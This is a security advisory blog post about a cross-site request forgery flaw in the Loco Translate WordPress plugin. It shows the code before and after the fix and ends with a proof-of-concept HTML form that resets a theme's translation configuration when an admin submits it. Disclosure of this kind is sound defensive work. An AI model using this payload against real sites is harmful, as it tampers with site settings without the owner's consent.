Login
3 Jun 2024

Developer of Million+ Install WordPress Plugin Discloses Security Vulnerability Without Making Update Available

A lot of things can go wrong in trying to fix vulnerabilities in WordPress plugins, sometimes things go wrong in an intentional way. That is the case with a vulnerability in the 1+ million install WordPress plugin Loco Translate. A week ago, the developer submitted a change for the plugin that fixes a vulnerability in the plugin. What they didn’t do was to release a new version of the plugin so that those using the plugin can update to a fixed version. While sometimes developers forget to bump the version number of the plugin, causing that situation. Here the developer is making changes to the plugin publicly before releasing a new version. That isn’t a good idea for security vulnerabilities, since it is possible to monitor for security changes, as we do, and notice such a situation.

In the submission to fix the vulnerability, the developer wrote “Fixed a missing security check – thanks Nosa Shandy.” The referenced security check is a nonce check, which prevents cross-site request forgery (CSRF). CSRF would allow an attacker to cause someone else to take an action they didn’t intend to. The vulnerability being fixed allowed that to occur when changing or resetting the advanced configuration options of a plugin or theme translation bundle from the plugin.

The issue was resolved in two places by adding a nonce check. Here is one of the lines before the check was added:

24

if( $post->has('conf') ){

And after:

24

if( $post->has('conf') && $this->checkNonce($nonce->action) ){

We checked for any similar code that still was vulnerable and we didn’t find any.

For the time being, anyone using the plugin who wants to protect their website from this vulnerability needs to download version 2.6.10 and replace the existing copy of the plugin.

Proof of Concept

The following proof of concept will reset the advanced configuration of the translation bundle for the Twenty Twenty-Four theme.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?bundle=twentytwentyfour&page=loco-theme&action=conf" method="POST">
<input type="submit" name="unconf" value="Submit" />
</form>
</body>

 

No related posts.

Plugin Security Scorecard Grade for Loco Translate

Checked on August 10, 2024
B+

See issues causing the plugin to get less than A+ grade

Leave a Reply

Your email address will not be published.